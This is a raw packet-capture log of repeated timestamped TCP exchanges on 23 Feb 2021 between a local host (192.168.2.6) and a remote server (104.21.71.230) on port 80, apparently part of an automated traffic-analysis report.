                                                Feb 23, 2021 09:58:20.515604019 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.515652895 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:20.516397953 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.516419888 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.516474009 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:20.518820047 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.518848896 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.518867970 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.518882036 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.518896103 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.518913984 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.519066095 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:20.519582987 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.519654989 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:20.519655943 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.520318031 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.520378113 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.520382881 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:20.521065950 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.521143913 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.521195889 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:20.521830082 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.521868944 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.521936893 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:20.522607088 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.522639036 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.522730112 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:20.523437977 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.523469925 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.523570061 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:20.524183035 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.524209976 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:20.524275064 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.426383018 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.426425934 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.426660061 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.426661968 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.426692009 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.426795959 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.427478075 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.427511930 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.427681923 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.428242922 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.428275108 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.428390026 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.428998947 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.429033995 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.429140091 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.429775953 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.429807901 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.429898977 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.430577993 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.430608988 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.430774927 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.431330919 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.431360960 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.431485891 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.432128906 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.432161093 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.432326078 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.432888985 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.432921886 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.433056116 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.433700085 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.433741093 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.433829069 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.434468031 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.477571964 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.734060049 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.734100103 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.734302044 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.734355927 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.734378099 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.734869003 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.735152006 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.735178947 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.735389948 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.742897034 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.742942095 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.743174076 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.743216991 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.743242979 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.744016886 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.744056940 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.744066954 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.744185925 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.744779110 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.744815111 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.745462894 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.745573997 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.752008915 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.752046108 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.752160072 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.752336025 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.752361059 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.752428055 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.753143072 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.753170967 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.753293037 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.753925085 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.753953934 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.754059076 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:21.754714012 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:21.754852057 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.705960035 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.706048965 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.706190109 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.706222057 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.706259012 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.706418991 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.707001925 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.707072973 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.707191944 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.707746029 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.707798958 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.707889080 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.708566904 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.708630085 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.708714008 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.709342003 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.709427118 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.709500074 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.711940050 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.712004900 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.712078094 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.712903023 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.712965965 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.713011980 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:22.713032007 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:22.758708954 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.013287067 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.013379097 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.013473034 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.013473988 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.028273106 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.028363943 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.028364897 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.028405905 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.028443098 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.028709888 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.028738022 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.028789997 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.029540062 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.071616888 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.411633968 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.411674976 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.411773920 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.411891937 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.411923885 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.411974907 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.412672997 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.412698030 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.412766933 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.416315079 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.416357040 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.416379929 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.416403055 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.416426897 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.416456938 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.416501999 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.420417070 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.420450926 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.420514107 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.420936108 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.420970917 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.421030045 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.421581984 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.421607971 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.421653032 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.422748089 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.422777891 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.422832966 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.423101902 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.423125982 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.423161030 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.423939943 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.424009085 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.424053907 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.424686909 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.424736977 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.424772978 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.477603912 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.718730927 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.718763113 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.718866110 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.719019890 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.719047070 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.719094992 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.719808102 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.719825983 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.719882965 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.722831964 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.722852945 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.722944021 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.723198891 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.723217964 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.723278046 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.723992109 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.724011898 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.724083900 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.724754095 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.724775076 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.724833012 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.725529909 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.729638100 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.729671001 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.729746103 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.729990005 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.730015993 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.730065107 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.730792999 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.730818033 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.730849028 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.731538057 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.731563091 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.731600046 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.732333899 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.732358932 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.732398987 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.733134031 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.733160019 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.733206034 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.733901024 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.733923912 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.733958006 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.734671116 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.734694004 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.734751940 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.735446930 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.735474110 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.735507011 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.736222982 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.736248016 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.736279964 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.737037897 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.737056971 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.737099886 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.790169954 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.210294962 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.210340977 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.210555077 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.210616112 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.210643053 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.210820913 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.211052895 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.211082935 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.211180925 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.211971045 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.211998940 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.212210894 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.212632895 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.212666035 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.212783098 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.213506937 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.213537931 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.213701963 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.214184046 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.214215994 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.214350939 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.214951992 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.214976072 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.215087891 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.215712070 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.215738058 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.215832949 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.216526031 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.216555119 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.216662884 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.217473030 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.258990049 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.507621050 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.507683039 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.507875919 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.507968903 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.508034945 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.508086920 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.508761883 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.508826017 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.509342909 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.509527922 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.509591103 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.509669065 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.510289907 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.510350943 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.510402918 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.511070013 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.511111975 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.511187077 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.805867910 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.805902958 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.805963039 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.806111097 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.806133986 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.806194067 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.806885004 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.806915045 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.806978941 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.807667017 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.807698011 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.807739019 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.808418036 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.808444023 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.808505058 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.809230089 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.811582088 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.811614037 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.811636925 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.811933994 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.811959982 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.811985016 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.812699080 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.812726974 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.812742949 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.813513041 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.813539028 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.813560963 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.814261913 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.814287901 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.814307928 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.815059900 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.815085888 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.815116882 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.815836906 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.815862894 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.815884113 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.816617012 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.816646099 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.816682100 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.817393064 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.817454100 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.817475080 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.818192959 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.818219900 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.818267107 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.818989992 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.819015980 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.819041967 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.819755077 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.819776058 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.819809914 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.868247032 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.210066080 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.210119963 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.210344076 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.210375071 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.210386992 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.210479975 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.222893953 CET8049711104.21.71.230192.168.2.6
